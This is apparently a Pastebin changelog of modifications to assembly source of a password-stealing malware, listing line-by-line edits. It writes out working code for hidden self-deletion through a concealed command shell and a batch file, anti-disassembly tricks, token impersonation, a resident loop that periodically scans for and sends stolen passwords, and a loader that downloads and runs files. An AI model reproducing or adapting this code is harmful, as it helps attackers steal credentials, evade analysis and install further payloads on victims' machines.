Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Line 35 (code addition):
- includelib DLL_Loader.lib
- Line 57 (code edition):
- push ebp -> xor edx, eax
- mov ebp, esp -> xor eax, edx
- pop ebp -> xor edx, eax
- Line 63 (code addition):
- nop
- Line 65 (code addition):
- nop
- Line 67 (code addition):
- nop
- Line 70 (code edition):
- db 0ffh -> db 0feh
- Line 75 (code deletion):
- Removed the IFDEF USE_UPX
- Line 80 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 84 (code addition):
- include Loader.asm
- Line 110 (code addition):
- nop
- Line 118 (code addition):
- nop
- Line 119 (code edition):
- push 19131011 -> push 19131012
- Line 129 (code addition):
- nop
- Line 135 (code addition):
- nop
- Line 164 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 451 (code addition):
- ENDIF
- Line 451 (code addition):
- IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE
- Line 456 (code addition/deletion):
- Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
- Added:
- szBatchFmt db '%d.bat',0
- szSelfDelQuoteFmt db ' "%s" ',0
- szShellExecute db 'ShellExecuteA',0
- szBatchFile db 13,10,9,9,13,10,13,10,09," :ktk ",13,10,13,10,13,10," del ",9," %1 ",13,10,9,"if ",9,9," exist ",9," %1 ",9," goto ",9,13," ktk",13,10," del ",9," %0 ",0
- szShell32Lib db 'shell32.dll',0
- szComSpec db 'COMSPEC', 0
- szSelfCommand db '%s /c del "%s" > NUL',0
- Line 466 (code deletion/edition)
- RunLoader procedure removed/replaced by:
- ; Self delete using comspec
- SelfDeleteComSpec proc uses ebx
- LOCAL lpSelfFileName: DWORD
- LOCAL lpComSpec: DWORD
- LOCAL lpCommandBuffer: DWORD
- LOCAL _si: STARTUPINFO
- LOCAL _pi: PROCESS_INFORMATION
- Line 474 (code deletion/edition):
- AntiDisasmTrick replaced by:
- invoke MemAlloc, MAX_PATH+1
- mov lpSelfFileName, eax
- Line 477 (code deletion/edition):
- mov edi, offset szLoaderList removed by:
- invoke MemAlloc, MAX_PATH+1
- mov lpComSpec, eax
- Line 480 (code deletion/edition):
- IFDEF LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
- invoke MemAlloc, MAX_PATH+1
- mov lpCommandBuffer, eax
- Line 466 (huge code addition/deletion):
- ; Self delete using comspec
- SelfDeleteComSpec proc uses ebx
- LOCAL lpSelfFileName: DWORD
- LOCAL lpComSpec: DWORD
- LOCAL lpCommandBuffer: DWORD
- LOCAL _si: STARTUPINFO
- LOCAL _pi: PROCESS_INFORMATION
- invoke MemAlloc, MAX_PATH+1
- mov lpSelfFileName, eax
- invoke MemAlloc, MAX_PATH+1
- mov lpComSpec, eax
- invoke MemAlloc, MAX_PATH+1
- mov lpCommandBuffer, eax
- invoke GetModuleFileName, NULL, lpSelfFileName, MAX_PATH
- invoke GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH
- invoke ZeroMemory, addr _si, sizeof _si
- invoke ZeroMemory, addr _pi, sizeof _pi
- mov _si.cb, sizeof _si
- mov _si.dwFlags, STARTF_USESHOWWINDOW
- mov _si.wShowWindow, SW_HIDE
- invoke GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
- .IF eax
- invoke wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
- invoke CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
- .IF eax
- invoke GetCurrentProcess
- invoke SetPriorityClass, eax, HIGH_PRIORITY_CLASS
- invoke SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
- invoke SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
- invoke ResumeThread, _pi.hThread
- inc ebx
- .ENDIF
- .ENDIF
- invoke MemFree, lpSelfFileName
- invoke MemFree, lpComSpec
- invoke MemFree, lpCommandBuffer
- mov eax, ebx
- ret
- SelfDeleteComSpec endp
- Line 526 (code addition):
- invoke SelfDeleteComSpec
- .IF eax
- ret
- .ENDIF
- Line 740 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 872 (code addition):
- ENDIF
- Line 874 (code edition):
- InitApp proc -> InitApp proc lpUserToken
- Line 887 (code edition):
- invoke ImpersonateLocalSystemUser -> invoke ImpersonateLocalSystemUser, lpUserToken
- Line 893 (comment addition):
- ; Get impersonated username to ignore it in brute-force procedure
- Line 905 (code edition/deletion):
- IFNDEF DISABLE_GRABBER
- IFDEF ENCRYPT_REPORT
- invoke DecodeReportPassword, offset CReportPassword
- ENDIF
- Line 911 (code addition):
- invoke Randomize
- Line 921 (code edition):
- mov eax, EXCEPTION_CONTINUE_SEARCH-> mov eax, EXCEPTION_CONTINUE_SEARCH
- Line 926 (code addition):
- LOCAL lpUserToken: DWORD
- LOCAL isFirstCycleRun: DWORD
- Line 936 (code addition/deletion):
- invoke InitApp replaced by:
- mov lpUserToken, NULL ; impersonated user token
- invoke InitApp, addr lpUserToken
- IFDEF ENABLE_RESIDENT_MODE
- invoke CopyRunFromAutoDirectory
- ENDIF
- Line 945 (Code addition):
- invoke DecipherList, offset CWordList
- Line 948 (deletion/edition):
- invoke ScanAndSend replaced by:
- IFNDEF DISABLE_GRABBER
- invoke ScanAndSend
- ELSE
- invoke MyDownloadInit
- ENDIF
- Line 954 (comment edition):
- ; Run loader (it will attempt to download and execute files with current logged on account privileges
- ; when run from Windows Service [LocalSystem user], which has limited (tricked) access to HKCU path and %APPDATA%)
- Line 957 (code edition):
- invoke RunLoader -> invoke RunLoader, lpUserToken
- Line 960 (Procedure addition):
- ENDIF
- ; Resident looped cycle
- mov isFirstCycleRun, TRUE ; do not send passwords for the first cycle
- IFDEF ENABLE_RESIDENT_MODE
- .WHILE TRUE
- IFDEF PERIODIC_PASSWORD_SCAN
- IFNDEF DISABLE_GRABBER
- invoke NeedsPasswordGrabbing
- .IF eax && !isFirstCycleRun
- ; Scan and send passwords
- invoke ScanAndSend
- .ENDIF
- ENDIF
- ENDIF
- invoke Sleep, RESIDENT_LOADER_TIMEOUT*60*1000
- IFDEF ENABLE_LOADER
- invoke RunLoader, lpUserToken
- ENDIF
- mov isFirstCycleRun, FALSE
- .ENDW
- Line 993 (code edition):
- IFNDEF DISABLE_GRABBER
- Line 996 (code edition):
- ENDIF
- Line 998: (comment addition):
- ; Self delete executable (works also for DLL mode - in this case parent executable will get deleted)
- Line 1023 (code deletion):
- After AntiDisasmTrick this part disapeared:
- .WHILE TRUE
- invoke GetTickCount
- mov ecx, 10
- xor edx, edx
- div ecx
- .IF edx == 5
- .BREAK
- .ENDIF
- .ENDW
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
